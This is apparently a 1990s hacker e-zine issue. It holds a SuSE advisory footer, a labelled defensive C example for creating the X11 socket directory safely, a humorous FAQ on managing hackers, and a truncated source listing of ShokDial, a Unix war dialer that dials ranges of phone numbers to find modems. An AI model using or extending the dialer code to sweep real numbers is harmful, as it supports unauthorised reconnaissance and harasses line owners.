suse-security-announce@suse.com - SuSE's announce-only mailing list.
                                  Only SuSE's security announcements are sent
                                  to this list.

To subscribe, send an email to majordomo@suse.com with the text

subscribe suse-security
or
subscribe suse-security-announce

in the body of the message. Or just issue a

echo subscribe suse-security | mail majordomo@suse.com
or
echo subscribe suse-security-announce | mail majordomo@suse.com

______________________________________________________________________________

If you want to report *NEW* security bugs in the SuSE Linux Distribution
please send an email to security@suse.de or call our support line.
You may use pgp with the public key below to ensure confidentiality.
______________________________________________________________________________

This information is provided freely to everyone interested and may
be redistributed provided that it is not altered in any way.

Visit http://www.suse.de/security for our pgp finger print.

Type Bits/KeyID Date User ID
pub 2048/3D25D3D9 1999/03/06 SuSE Security Team <security@suse.de>


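Added here as an example, not part of the SuSE advisory and not XFree86's code: creating the /tmp/.X11-unix socket directory so that a symlink planted under that name is refused instead of having its target chmod'ed to 1777, which is the flaw the advisory describes. The scratch directory, the victim directory and the return codes are constructed for this example.

```c
/* Added example: race-safe creation of a 1777 socket directory that never
 * applies the mode through a symlink. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

enum {
    SOCKDIR_OK = 0,
    SOCKDIR_SYMLINK,    /* the name is a symlink: refuse it */
    SOCKDIR_NOT_DIR,    /* exists but is not a directory */
    SOCKDIR_BAD_OWNER,  /* directory owned by someone else */
    SOCKDIR_ERR         /* syscall failure, errno is set */
};

/* mkdir() does not follow a symlink at the last component, lstat() inspects
 * the name itself, and the mode is applied with fchmod() on a descriptor
 * whose inode is checked against the lstat() result, so the chmod can never
 * land on a directory the name was redirected to. */
int secure_sockdir(const char *path, uid_t owner)
{
    struct stat st, st2;
    int fd;

    if (mkdir(path, 01777) != 0 && errno != EEXIST)
        return SOCKDIR_ERR;
    if (lstat(path, &st) != 0)
        return SOCKDIR_ERR;
    if (S_ISLNK(st.st_mode))
        return SOCKDIR_SYMLINK;
    if (!S_ISDIR(st.st_mode))
        return SOCKDIR_NOT_DIR;
    if (st.st_uid != owner)
        return SOCKDIR_BAD_OWNER;

    fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return SOCKDIR_ERR;               /* ELOOP: a link raced in */
    if (fstat(fd, &st2) != 0 || st2.st_dev != st.st_dev ||
        st2.st_ino != st.st_ino || fchmod(fd, 01777) != 0) {
        close(fd);
        return SOCKDIR_ERR;
    }
    close(fd);
    return SOCKDIR_OK;
}

/* Constructed scenario from the advisory: a symlink named .X11-unix points
 * at a victim directory (mode 0700). Returns 1 if the link is refused and
 * the victim's mode is untouched, 0 if not, -1 if setup failed. */
int demo_symlink_refused(void)
{
    char base[] = "/tmp/sockdir-demo-XXXXXX";
    char victim[300], link[300];
    struct stat st;
    int ok;

    if (mkdtemp(base) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(link, sizeof link, "%s/.X11-unix", base);
    if (mkdir(victim, 0700) != 0 || symlink(victim, link) != 0)
        return -1;
    ok = secure_sockdir(link, getuid()) == SOCKDIR_SYMLINK &&
         stat(victim, &st) == 0 && (st.st_mode & 07777) == 0700;
    unlink(link); rmdir(victim); rmdir(base);
    return ok ? 1 : 0;
}

/* Normal case: nothing planted, the directory is created and ends up mode
 * 1777 whatever the umask. Returns 1 on success, 0 otherwise, -1 on setup
 * failure. */
int demo_fresh_dir(void)
{
    char base[] = "/tmp/sockdir-demo-XXXXXX";
    char dir[300];
    struct stat st;
    int ok;

    if (mkdtemp(base) == NULL)
        return -1;
    snprintf(dir, sizeof dir, "%s/.X11-unix", base);
    ok = secure_sockdir(dir, getuid()) == SOCKDIR_OK &&
         lstat(dir, &st) == 0 && S_ISDIR(st.st_mode) &&
         (st.st_mode & 07777) == 01777;
    rmdir(dir); rmdir(base);
    return ok ? 1 : 0;
}
```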


@HWA


18.0 The proper care and feeding of your new hacker will ensure months of enjoyable employment on end.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is from: http://www.plethora.net/~seebs/faqs/hacker.html


The following list is an attempt to cover some of the issues that will invariably come up when people without previous experience of the hacker community try to hire
a hacker. This FAQ is intended for free distribution, and may be copied as desired. It is in an early revision. If you wish to modify the FAQ, or distribute it for
publication, please contact the author. The author is seebs@plethora.net. The official distribution site (as of revision 0.04) is
"http://www.plethora.net/~seebs/faqs/hacker.html".

If you find this information useful, please consider sending a token donation to the author; email for details.

DISCLAIMER: The author is a hacker. Bias is inevitable.

This document is copyright 1995, 1996, 1998 Peter Seebach. Unaltered distribution is permitted.

Revision 0.04 - Last modified September 7, 1998

Questions and Answers:

Section 0: Basic understanding.

0.0: Won't my hacker break into my computer and steal my trade secrets?

No. Hackers aren't, contrary to media reporting, the people who break into computers. Those are crackers. Hackers are people who enjoy playing with
computers. Your hacker may occasionally circumvent security measures, but this is not malicious; she just does it when the security is in her way, or because
she's curious.

0.1: Was it a good idea to hire a hacker?

It depends on the job. A hacker can be dramatically more effective than a non-hacker at a job, or dramatically less effective. Jobs where hackers are
particularly good are:
    Systems administration
    Programming
    Design
Jobs where hackers are particularly bad are:
    Data entry

More generally, a job that requires fast and unexpected changes, significant skill, and is not very repetitive will be one a hacker will excel at. Repetitive, simple
jobs are a waste of a good hacker, and will make your hacker bored and frustrated. No one works well bored and frustrated.

The good news is, if you get a hacker on something he particularly likes, you will frequently see performance on the order of five to ten times what a "normal"
worker would produce. This is not consistent, and you shouldn't expect to see it all the time, but it will happen. This is most visible on particularly difficult
tasks.

0.2: How should I manage my hacker?

The same way you herd cats. It can be a bit confusing; they're not like most other workers. Don't worry! Your hacker is likely to be willing to suggest answers
to problems, if asked. Most hackers are nearly self-managing.

0.3: Wait, you just said "10 times", didn't you? You're not serious, right?

Actually, I said "ten times". And yes, I am serious; a hacker on a roll may be able to produce, in a period of a few months, something that a small development
group (say, 7-8 people) would have a hard time getting together over a year. They also may not. Your mileage will vary.

IBM used to report that certain programmers might be as much as 100 times as productive as other workers, or more. This kind of thing happens.

0.4: I don't understand this at all. This is confusing. Is there a book on this?

Not yet. In the meantime, check out The New Hacker's Dictionary (references below; also known as "the jargon file"), in particular some of the appendices.
The entire work is full of clarifications and details of how hackers think.

Section 1: Social issues

1.0: My hacker doesn't fit in well with our corporate society. She seems to do her work well, but she's not really
making many friends.

This is common. Your hacker may not have found any people around who get along with hackers. You may wish to consider offering her a position
tele-commuting, or flexible hours (read: night shift), which may actually improve her productivity. Or hire another one.

1.1: My hacker seems to dress funny. Is there any way to impress upon him the importance of corporate appearance?

Your hacker has a very good understanding of the importance of corporate appearance. It doesn't help you get your job done. IBM, Ford, and Microsoft
have all realized that people work better when they can dress however they want. Your hacker is dressed comfortably. A polite request to dress up some for
special occasions may well be honored, and most hackers will cheerfully wear clothes without holes in them if specifically asked.

1.2: My hacker won't call me by my title, and doesn't seem to respect me at all.

Your hacker doesn't respect your title. Hackers don't believe that management is "above" engineering; they believe that management is doing one job, and
engineering is doing another. They may well frequently talk as if management is beneath them, but this is really quite fair; your question implies that you talk as
if engineering is beneath you. Treat your hacker as an equal, and she will probably treat you as an equal -- quite a compliment!

1.3: My hacker constantly insults the work of my other workers.

Take your hacker aside, and ask for details of what's wrong with the existing work. It may be that there's something wrong with it. Don't let the fact that it runs
most of the time fool you; your hacker is probably bothered by the fact that it crashes at all. He may be able to suggest improvements which could
dramatically improve performance, reliability, or other features. It's worth looking into.

You may be able to convince your hacker to be more polite, but if there appear to be major differences, it's quite possible that one or more of your existing
staff are incompetent. Note that hackers, of course, have different standards of competence than many other people. (Read "different" as "much higher".)

Section 2: Productivity.

2.0: My hacker plays video games on company time.

Hackers, writers, and painters all need some amount of time to spend "percolating" -- doing something else to let their subconscious work on a problem. Your
hacker is probably stuck on something difficult. Don't worry about it.

2.1: But it's been two weeks since I saw anything!

Your hacker is working, alone probably, on a big project, and just started, right? She's probably trying to figure it all out in advance. Ask her how it's going; if
she starts a lot of sentences, but interrupts them all with "no, wait..." or "drat, that won't work", it's going well.

2.2: Isn't this damaging to productivity?

No. Your hacker needs to recreate and think about things in many ways. He will be more productive with this recreation than without it. Your hacker enjoys
working; don't worry about things getting done reasonably well and quickly.

2.3: My hacker is constantly doing things unrelated to her job responsibilities.

Do they need to be done? Very few hackers can resist solving a problem when they can solve it, and no one else is solving it. For that matter, is your hacker
getting her job done? If so, consider these other things a freebie or perk (for you). Although it may not be conventional, it's probably helping out quite a bit.

2.4: My hacker is writing a book, reading USENET news, playing video games, talking with friends on the phone, and
building sculptures out of paper clips. On company time!

He sounds happy. The chances are he's in one of three states:
1. Basic job responsibilities are periodic (phone support, documentation, et al.) and there's a lull in incoming work. Don't worry about it!
2. Your hacker is stuck on a difficult problem.
3. Your hacker is bored silly and is trying to find amusement. Perhaps you should find him more challenging work?

Any of these factors may be involved. All of them may be involved. In general, if the work is challenging, and is getting done, don't worry too much about the
process. You might ask for your corporation to be given credit in the book.

2.5: But my other workers are offended by my hacker's success, and it hurts their productivity.

Do you really need to have workers around who would rather be the person getting something done, than have it done already? Ego has very little place in the
workplace. If they can't do it well, assign them to something they can do.

Section 3: Stimulus and response

3.0: My hacker did something good, and I want to reward him.

Good! Here are some of the things most hackers would like to receive in exchange for their work:
1. Respect.
2. Admiration.
3. Compliments.
4. Understanding.
5. Discounts on expensive toys.
6. Money.

These are not necessarily in order. The 4th item (understanding) is the most difficult. Try to remember this good thing your hacker just did the next time you
discover he just spent a day playing x-trek. Rather than complaining about getting work done, write it off as "a perk" that was granted (informally) as a bonus
for a job well done. Don't worry; hackers get bored quickly when they aren't doing their work.

3.1: My hacker did something bad, and I want to punish him.

Don't. 30 years of psychological research has shown that punishment has no desirable long-term effects. Your hacker is not a lab rat. (Even if he *were* a lab
rat, punishment wouldn't work; at least, not if he were one of the sorts of lab rats the psych research was done on.) If you don't like something your hacker is
doing, express your concerns. Explain what it is that bothers you about the behavior.

Be prepared for an argument; your hacker is a rational entity, and presumably had reasons. Don't jump on him too quickly; they may turn out to be good
reasons.

Don't be afraid to apologize if you're wrong. If your hacker admits to having been wrong, don't demand an apology; so far as the hacker is concerned,
admitting to being wrong is an apology, most likely.

3.2: I don't get it. I offered my hacker a significant promotion, and she turned it down and acted offended.

A promotion frequently involves spending more time listening to people describing what they're doing, and less time playing with computers. Your hacker is
enjoying her work; if you want to offer a reward, consider an improvement in title, a possible raise, and some compliments. Make sure your hacker knows
you are pleased with her accomplishments -- that's what she's there for.

3.3: My company policy won't let me give my hacker any more raises until he's in management.

Your company policy is broken. A hacker can earn as much as $150 an hour (sometimes more) doing free-lance consulting. You may wish to offer your
hacker a contracted permanent consulting position with benefits, or otherwise find loopholes. Or, find perks to offer - many hackers will cheerfully accept a
discount on hardware from their favorite manufacturer as an effective raise.

3.4: I can't believe the hacker on my staff is worth as much as we're paying.

Ask the other staff in the department what the hacker does, and what they think of it. The chances are that your hacker is spending a few hours a week
answering arcane questions that would otherwise require an expensive external consultant. Your hacker may be fulfilling another job's worth of responsibilities
in his spare time around the office. Very few hackers aren't worth what they're getting paid; they enjoy accomplishing difficult tasks, and improving worker
efficiency.

Section 4: What does that mean?

4.0: My hacker doesn't speak English. At least, I don't think so.

Your hacker is a techie. Your best bet is to pick up a copy of TNHD (The New Hacker's Dictionary). It can be found as http://www.ccil.org/jargon (last I
checked) or from a good bookstore. If you have trouble understanding that reference, ask your hacker if she has a copy, or would be willing to explain her
terms. Most hackers are willing to explain terms. Be ready for condescension; it's not intended as an insult, but if you don't know the words, she probably has
to talk down to you at first to explain them.

It's a reasonably difficult set of words; there are a lot of them, and their usage is much more precise than it sounds. Hackers love word games.

[It is also possible that English is not your hacker's native language, and that it's not yours either. Feel free to substitute a more appropriate language.]

4.1: I can't get an estimate out of my hacker.

Your hacker hasn't figured out how hard the problem is yet. Unlike most workers, hackers will try very hard to refuse to give an estimate until they know for
sure that they understand the problem. This may include solving it.

No good engineer goes beyond 95% certainty. Most hackers are good engineers. If you say you will not try to hold him to the estimate (and mean it!) you are
much more likely to get an approximate estimate. The estimate may sound very high or very low; it may be very high or very low. Still, it's an estimate, and
you get what you ask for.

4.2: My hacker makes obscure, meaningless jokes.

If you feel brave, ask for an explanation. Most of them can be explained. It may take a while, but it may prove interesting.

4.3: My hacker counts from zero.

So does the computer. You can hide it, but computers count from zero. Most hackers do by habit, also.


Comments about this article can be sent to

seebs@plethora.net


19.0 Unix wardialer from w00w00 security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is included here for example purposes; the full source is available at
http://www.w00w00.org/w00w00/ShokDial/

/* ShokDial */
/* w00w00! */
/* This is (I have never seen one anyway, I apologize if I'm wrong) */
/* the first war dialer that I've ever seen for unix. This will */
/* compile on most/all unix operating systems. */
/* */
/* Shok (Matt Conover) */
/* shok@sekurity.org, shok@w00w00.org */


#include <time.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <ctype.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>

#include "colors.h"

#define ERROR -1
#define LOGFILE "wardial.log" /*
                               * Used as the default logfile,
                               * unless you change this define
                               * or specify it as an option.
                               * Type: shokdial -h for help.
                               */

#define VERSION "v4.1"
#define TIMEOUT 25 /*
                    * YOU WANT TO CONFIGURE THIS!!!
                    * This is how long it will wait until it
                    * gives up (or connects, whichever comes first)
                    */

/* You can do:
 * ln -s /dev/cua1 /dev/modem
 * or change this to /dev/cua1 (or whatever your COM is)
 * cua0 = COM1 cua1 = COM2
 * (in linux)...in IRIX this would be /dev/ttymX I believe
 */

#define MODEMPORT "/dev/modem"


/* Global variables */
/* ---------------- */
int fd; /* fd for modem */
int rand; /* Use random scanning if this is set */
int send; /* Do we send a string to the carrier? */
int daemon; /* Do we fork into the background? */
int listen; /* Do we check a response from the carrier? */
int useStdin; /* Do we read numbers from stdin? */
int numbytes; /* To verify that all the bytes were written */

int First3Digits; /* Such as "555" of 555-XXXX */
/* However, this also serves as the area code */
/* for a long distance number */

int First3Digits1; /* This allows multiple ranges such as */
/* 555-XXXX through 556-XXXX */

int Last3Digits; /* Used as XXX-555-XXXX */
int Last3Digits1; /* Same purpose as First3Digits1 */
int ScanMin; /* Number to scan from....like 0000 and up */
int ScanMin1; /* Where to hold ScanMin the whole time */
int ScanMax; /* Stop scanning when this number is reached */
int response; /* Used to test if response timed out */
char *LogFile; /* Where to log connections */
char buf[2048]; /* Buffer for strings returned by modem */
char pnum[512]; /* This is the phone number from config file */
char LocalOrLong; /* Dialing long distance of local */
char sendstring[512]; /* Send to string to carrier (if send is set) */

char *ProgName;

int noshow; /* Don't display opening port when reopening */
int conf; /* Dial using config file */
int noOK; /* Used with hanging up and checking "OK" */

volatile int sig; /* Set after signal received and finished */
volatile int connected = 0; /* Set to 1 when connected. */

/* Some statistics. */
int busy = 0;
int connect = 0;
int noresponse = 0;

/* Function prototypes */
/* ------------------- */
void usage(); /* Help/usage */
void version(); /* Display version */
void intro(); /* An introduction */
void daemonize_me(); /* Fork into the background */
void get_scanrange(); /* Get the scanning range */
void open_port(); /* Open modem port for dialing */
void init_modem(); /* Initialize the modem */
void dial_number(); /* Dial the number */
void inputdial(); /* Read numbers from stdin */
void confdial(char *confile); /* For reading/dialing from conf file */
void hangup(); /* Hang up modem. */
void menu(int signum); /* Called when an abort is received. */
void sighandler(int signum); /* Used when signals are received */
void sighandler1(int signum); /* Ditto */
void stopnow(int signum); /* Called from sig handler for an un- */
/* conditional exit. */

/* Function prototypes in other source files: */
/* ------------------------------------------ */
/* Check read/write/opens for errors */
void check_for_error(char *LogFile, int fd, int num, char *s);

/* Check for "OK" from modem in reads. */
int checkok(char *LogFile, int fd, char *buf, char *s);

/* Check if the phone num was valid. */
void local_validnum(int digits);
void long_validnum(int firstdigits, int lastdigits);

/* Check to make sure they didn't pass conflicting options. */
void checkoptions();

/* Other miscellaneous prototypes included to avoid. */
int clr();
void strip();

int main(int argc, char **argv)
{
int opt;
char *confile;

clr(); /* Clear the screen. */

/* Do some stuff with the arguments */
/* ----------------------------------------------------- */

ProgName = argv[0];

if (argc > 1) {
while ((opt = getopt (argc, argv, "SsrdvhL:lc:")) != ERROR)
switch(opt)
{
case 'S':
useStdin = 1;
break;

case 's':
send = 1;
break;

case 'r':
rand = 1;
break;

case 'd':
daemon = 1;
break;

case 'v':
version();

case 'h':
usage();

case 'L':
LogFile = optarg;
break;

case 'l':
listen = 1;
break;

case 'c':
conf = 1;
confile = optarg;
break;

case '?':
putchar('\n');
usage();

default:
usage();
}
}

/* Check to make sure they didn't pass conflicting options. */
checkoptions(); /* exit()'s if there is an error */

if (conf != 1 && useStdin != 1 && rand != 1) /* Only say so when -r really was not given */
printf("\"%s-r%s\" (%srandom scanning%s) option not given, using %ssequential scanning%s instead.\n",
PINK, NORMAL, BOLDWHITE, NORMAL, BOLDRED, NORMAL);

if (LogFile == NULL) {
LogFile = LOGFILE;
printf("Using \"%s%s%s\" as log file.\n", BOLDGREEN, LogFile, NORMAL);
}

printf("\nHit any key to continue...");
getchar();

/* ----------------------------------------------------- */

clr(); /* Clear the screen. */
intro();

clr(); /* Clear the screen. */
if (conf != 1 && useStdin != 1) get_scanrange();


/* We don't want to handle any signals until here */
signal(SIGINT, menu);
signal(SIGTERM, menu);
signal(SIGHUP, SIG_IGN);
signal(SIGALRM, sighandler1);

if (daemon == 1)
daemonize_me(); /* Run the program in the background */

open_port(); /* Open MODEMPORT (by default /dev/cua1) */
init_modem(); /* Initialize modem (such as sending ATZ) */

if (send == 1) {
printf("Enter string to send to carrier (when connected): ");
scanf("%511s", sendstring); /* sendstring holds 512 bytes, one is for the NUL */
}

/* What type of dialing are we using? */
if (conf == 1)
confdial(confile); /* Read numbers to dial from a config file */

else if (useStdin == 1)
inputdial(); /* Read numbers from stdin */

else dial_number(); /* Do the scanning (used by default, instead */
/* of confdial(), inputdial(), etc.) */

/* ---------------------------------- */

hangup(); /* Hang up the modem */
close(fd); /* Close the open file descriptor of the modem */

return 0;
}

/* -------------------------------------------------- */

void version()
{
printf("This is %sS%sh%so%sk%sD%si%sa%sl %s%s%s...please keep notice of this.\n",
BOLDCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);

printf("in case this program undergoes some new features, fixes, etc.\n\n");

printf("\t\t\t%s Shok %s\n\t\t (%sMatt Conover%s)\n\n",
BOLDBLUE, NORMAL, BOLDWHITE, NORMAL);

printf("%sEmail%s: %sshok@w00w00.org%s, %sshok@sekurity.org%s\n",
BOLDWHITE, NORMAL, PINK, NORMAL, PINK, NORMAL);
printf("%sWWW%s: %shttp://www.w00w00.org/%s\n",
BOLDWHITE, NORMAL, PINK, NORMAL);
printf("%sFTP%s: %sftp://ftp.w00w00.org/pub%s\n\n",
BOLDWHITE, NORMAL, PINK, NORMAL);


exit(0);
}

/* -------------------------------------------------- */

void usage()
{
printf("Usage: %s%s %s[-rhvdSsl]%s -c [config file]%s -L [logfile]%s\n\n", PINK, ProgName, BOLDWHITE, BOLDCYAN, BOLDGREEN, NORMAL);
printf("Options:\n");
printf("%s-r%s for %srandom%s (as opposed to %ssequential%s) scanning\n", BOLDCYAN, NORMAL, PINK, NORMAL, YELLOW, NORMAL);
printf("%s-h%s for %shelp%s....what you're seeing now\n", PINK, NORMAL, BOLDRED, NORMAL);
printf("%s-v%s for the %sversion%s...because this will probably undergo changes\n", BOLDGREEN, NORMAL, BOLDCYAN, NORMAL);
printf("%s-d%s to run in the %sbackground%s.\n", BLUE, NORMAL, BOLDGREEN, NORMAL);
printf("%s-S%s to read numbers from %sstdin%s\n", PINK, NORMAL, BOLDRED, NORMAL);
printf("%s-l%s to listen for a %sresponse%s from the carrier\n", BOLDCYAN, NORMAL, PINK, NORMAL);
printf("%s-s%s to send a %sstring%s to the carrier\n", BOLDGREEN, NORMAL, BOLDCYAN, NORMAL);
printf("%s-c%s to read phone numbers from a %sconfig file%s.\n", YELLOW, NORMAL, BOLDCYAN, NORMAL);
printf("%s-L%s to specify the %slogfile%s.\n", BOLDRED, NORMAL, PINK, NORMAL);

putchar('\n');

printf("The %slogfile%s is by default %s%s%s if not specified.\n", BOLDCYAN, NORMAL, BOLDGREEN, LOGFILE, NORMAL);
printf("The %sconfig file%s is only specified if %s-c%s option is used.\n", PINK, NORMAL, BOLDCYAN, NORMAL);

putchar('\n');
exit(1);
}

/* -------------------------------------------------- */

void intro()
{
printf("\t\t%sS%sh%so%sk%sd%si%sa%sl%s %s%s %sf%so%sr %sU%sN%si%sX%s\n",
BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL, PINK, BOLDCYAN,
BOLDGREEN, BOLDPINK, BOLDGREEN, BOLDWHITE, BOLDBLUE, NORMAL);

printf("\t\t----------------------\n");
printf("\nWell what you do here, is enter 0000 for the range to begin\n");
printf("scanning and 9999 to end scanning if you want to scan all the\n");
printf("possible ranges, but you can put 4444 for the number to start\n");
printf("and 5555 for the number to begin to scan XXX-[4444-5555] for\n");
printf("local numbers and it would be 1-XXX-XXX-[4444-5555] for long\n");
printf("distance.\n");
printf("\nAlso, you can use random scanning (as opposed to sequential\n");
printf("scanning) by specifying the \"%s-r%s\" option...type:\n",
PINK, NORMAL);

printf("%s%s%s -h %sfor %shelp%s.\n\n",
BOLDRED, ProgName, BOLDRED, NORMAL, BOLDCYAN, NORMAL);

printf("Anyway, enjoy!\n\n");

printf("\t\t\t%s Shok %s\n\t\t (%sMatt Conover%s)\n\n",
BOLDBLUE, NORMAL, BOLDWHITE, NORMAL);

printf("%sEmail%s: %sshok@w00w00.org%s, %sshok@sekurity.org%s\n",
BOLDWHITE, NORMAL, PINK, NORMAL, PINK, NORMAL);
printf("%sWWW%s: %shttp://www.w00w00.org/%s\n",
BOLDWHITE, NORMAL, PINK, NORMAL);
printf("%sFTP%s: %sftp://ftp.w00w00.org/pub%s\n\n",
BOLDWHITE, NORMAL, PINK, NORMAL);


printf("Hit enter to continue...\n");
getchar();
}

/* -------------------------------------------------- */

void daemonize_me()
{
pid_t pid;

if ((pid = fork()) == ERROR) {
perror("fork");
exit(ERROR);
}

if (pid != 0)
exit(0);
}

/* -------------------------------------------------- */

void get_scanrange()
{

/* Get location of numbers: local numbers or long distance numbers */
LorD:
printf("Scanning..\n(%sL%s)ocal, Long (%sD%s)istance: ",
PINK, NORMAL, PINK, NORMAL);

while(1) {
LocalOrLong = getchar();

if (!isprint(LocalOrLong)) continue;
if ((toupper(LocalOrLong) != 'L') && (toupper(LocalOrLong) != 'D')) {
printf("%sInvalid%s option '%s%c%s'. Enter '%sL%s' or '%sD%s'.\n\n",
BOLDRED, NORMAL, BOLDCYAN, LocalOrLong, NORMAL, YELLOW,
NORMAL, YELLOW, NORMAL);
goto LorD; /* Reprint message. */
} else break;
}

if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */
if (rand != 1) { /* Using sequential scanning */

printf("Enter number to begin scan on (555-1111): ");
scanf("%3d%*c%4d", &First3Digits, &ScanMin);

local_validnum(First3Digits); /* Make sure the first 3 digits */
/* were a valid number. */

ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
/* variable to store the original number. */

} else { /* Using random scanning */

printf("Enter the first 3 digits (555 for random scanning of 555-XXXX): ");
scanf("%3d", &First3Digits);

local_validnum(First3Digits); /* Make sure the first 3 digits */
/* were a valid number. */

ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
/* variable to store the original number. */
}

/* Make sure the last 4 digits were valid */
if ((ScanMin < 0) || (ScanMin > 9999)) {
printf("\"%s%d%s\" is invalid.\nScanning range must be %s0000-9999%s\n",
BOLDCYAN, ScanMin, NORMAL, PINK, NORMAL);
exit(ERROR);
}

if (rand != 1) { /* Using sequential scanning */

printf("Enter number to end scanning on (555-9999): ");
scanf("%3d%*c%4d", &First3Digits1, &ScanMax);

local_validnum(First3Digits1); /* Make sure the first 3 digits */
/* were a valid number. */
putchar('\n');

if ((ScanMax < ScanMin) || (ScanMax < 0) || (ScanMax > 9999)) {
printf("\"%s%d%s\" is invalid.\n Scanning range must be %s0000-9999%s, and the %smaximum%s range must be %sgreater%s\nthan or equal to the %sminimum%s number.\n",
BOLDCYAN, ScanMax, NORMAL, BOLDWHITE, NORMAL, PINK,
NORMAL, BOLDWHITE, NORMAL, PINK, NORMAL);

exit(ERROR);
}
} else
putchar('\n');


/* -------------------- */

} else if (toupper(LocalOrLong) == 'D') { /* Use long distance numbers */

if (rand != 1) { /* Use sequential scanning */
printf("Enter number to start scanning (555-555-1111): ");
scanf("%3d%*c%3d%*c%4d", &First3Digits, &Last3Digits, &ScanMin);

/* Check if area code and first 3 digits of the phone num are */
/* valid. */
long_validnum(First3Digits, Last3Digits);

ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
/* variable to store the original number. */

/* ... */

} else { /* Using random scanning */

printf("Enter the area code and prefix digits\n(555-555 for random scanning of 555-555-XXXX): ");
scanf("%3d%*c%3d", &First3Digits, &Last3Digits);

/* Check if area code and first 3 digits of the phone num are */
/* valid. */
long_validnum(First3Digits, Last3Digits);

ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
/* variable to store the original number. */
}

/* Make sure the last 4 digits were valid */
if ((ScanMin < 0) || (ScanMin > 9999)) {
printf("\"%s%d%s\" is invalid.\nScanning range must be %s0000-9999%s\n",
BOLDCYAN, ScanMin, NORMAL, PINK, NORMAL);
exit(ERROR);
}

if (rand != 1) { /* Using sequential scanning */

printf("Enter number to end scanning (555-555-9999): ");
scanf("%3d%*c%3d%*c%4d", &First3Digits1, &Last3Digits1, &ScanMax);

putchar('\n');

/* Check if area code and first 3 digits of the phone num are */
/* valid. */
long_validnum(First3Digits1, Last3Digits1);

if ((ScanMax < ScanMin) || (ScanMax < 0) || (ScanMax > 9999)) {
printf("\"%s%d%s\" is invalid.\n Scanning range must be %s0000-9999%s, and the %smaximum%s range must be %sgreater%s\nthan or equal to the %sminimum%s number.\n",
BOLDCYAN, ScanMax, NORMAL, BOLDWHITE, NORMAL, PINK,
NORMAL, BOLDWHITE, NORMAL, PINK, NORMAL);

exit(ERROR);
}
} else
putchar('\n');

} else {
printf("You must specify \"%sL%s\" for %slocal%s or \"%sD%s\" for %slong distance%s\n",
PINK, NORMAL, BOLDCYAN, NORMAL, PINK, NORMAL, BOLDCYAN, NORMAL);
exit(ERROR);
}

}

/* -------------------------------------------------- */

void open_port()
{
if (noshow != 1) printf("Opening modem for dialing...\n");

fd = open(MODEMPORT, O_RDWR | O_NOCTTY);

if (fd == ERROR) {
perror("open");
exit(ERROR);
}

noshow = 1; /* We use this function for reopening as well */
}

/* -------------------------------------------------- */

void init_modem()
{
FILE *logfile;

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
close(fd);
exit(ERROR);
}

printf("Initializing modem (port %s%s%s)....\n", PINK, MODEMPORT, NORMAL);

/* Hang up modem if it's already on */

hangup();

numbytes = write(fd, "+++\r", 4);
check_for_error(LogFile, fd, numbytes, "write");
usleep(1000000);

numbytes = write(fd, "ATZ\r", 4);
check_for_error(LogFile, fd, numbytes, "write");
usleep(2000000); /* Use this because we're using SIGALRM which */
/* is what sleep() uses. */

memset(buf, 0, sizeof(buf));
numbytes = read(fd, buf, sizeof(buf));
check_for_error(LogFile, fd, numbytes, "read");

noOK = checkok(LogFile, fd, buf, "initializing modem");

if (noOK == 1) {
fclose(logfile);
close(fd);
exit(ERROR);
}

memset(buf, 0, sizeof(buf));

fclose(logfile);
}

/* -------------------------------------------------- */

void dial_number()
{
time_t tm; /* Where our calendar time is stored */
FILE *logfile; /* for the log file */
char date[32]; /* Contain time scanning started/stopped */
char phonenum[20]; /* If local: phonenum = First3Digits + ScanMin */
/* If long distance: phonenum = */
/* First3Digits + Last3Digits + ScanMin */

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
exit(ERROR);
}

fprintf(logfile, "\n----------------------\n\n");
fflush(logfile);

memset(date, 0, sizeof(date));
memset(buf, 0, sizeof(buf));

tm = time(NULL);
sprintf(date, "%s", ctime(&tm));
fprintf(logfile, "Started scanning at/on: %s", date);

fflush(logfile);
memset(date, 0, sizeof(date));

if (daemon == 1) putchar('\n'); /* Just to make it look nicer */

printf("Using a %s%d%s second connection %stimeout%s.\n",
BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL);


if (toupper(LocalOrLong) == 'L') { /* Local call */

fprintf(logfile, "Scanning local numbers...\n");
fprintf(logfile, "Using a %d second connection timeout.\n", TIMEOUT);
fprintf(logfile, "Starting scanning with %d-%.4d\n\n",
First3Digits, ScanMin);

fflush(logfile);

while (1) {
if (rand == 1) ScanMin = (random() % 8889) + 1111; /* 1111-9999, same as the long distance loop */

printf("Dialing %s%d-%.4d%s...\n",
PINK, First3Digits, ScanMin, NORMAL);

memset(phonenum, 0, sizeof(phonenum));
sprintf(phonenum, "ATDT%d%.4d\r", First3Digits, ScanMin);

numbytes = write(fd, phonenum, strlen(phonenum));
check_for_error(LogFile, fd, numbytes, "write");

memset(buf, 0, sizeof(buf));

alarm(TIMEOUT); /* How long to wait for timeout */

sig = 0;
connected = 1; /*
* Easier to set it to 1 and then set it
* to 0 if it's not than vice versa.
*/

do {
numbytes = read(fd, buf, 511);
if (sig == 1) break;
} while ((strstr(buf, "CONNECT")) == NULL);

alarm(0); /* Turn alarm off if we haven't already. */

if (connected == 0) noresponse++;
